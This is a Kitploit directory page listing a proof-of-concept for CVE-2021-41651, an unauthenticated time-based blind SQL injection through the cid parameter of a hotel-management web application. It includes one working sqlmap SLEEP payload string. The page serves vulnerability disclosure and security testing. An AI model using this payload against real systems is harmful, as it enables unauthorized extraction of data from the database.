Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-41651 — Proof-of-concept exploit for CVE-2021-41651, demonstrating unauthenticated time-based blind SQL injection in hotel-mgmt-system via the cid parameter, enabling sensitive data extraction from MySQL. | Kitploit
Tools/GitHubGitHub/mobiusbinary/cve-2021-41651
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubmobiusbinary/cve-2021-41651

CVE-2021-41651

Proof-of-concept exploit for CVE-2021-41651, demonstrating unauthenticated time-based blind SQL injection in hotel-mgmt-system via the cid parameter, enabling sensitive data extraction from MySQL.

View Repository
14 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2021-41651

CVE-2021-41651 SQL Injection in hotel-mgmt-system

The hotel-mgmt-system is vulnerable to un-authenticated time based blind SQL Injection attack.

The cid parameter on the /process_update_profile.php page does not sanitize the user input, an attacker can extract sensisitive data from the underlying MySQL Database.

Link To Application

hotel-mgmt-system

Affected Components & Parameter

URL: /process_update_profile.php
PARAMETER: cid

Poc's

SQLMAP PAYLOADS

cid parameter on the /process_update_profile.php page

Parameter: cid ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: phone=123456778&cid=14 AND (SELECT 9048 FROM (SELECT(SLEEP(5)))zCfD)-- IKdVf&submitBtn=Update&fullName=James&[email protected]&newPassword=fasdfasdfasdfasdfasdf-

If the POC Image is unclear, please click on the GIF which will load in a better resolution.

POC - CID

Discovered by

Jason Colyvas
MOBIUSBINARY
September 23rd, 2021

Download Tool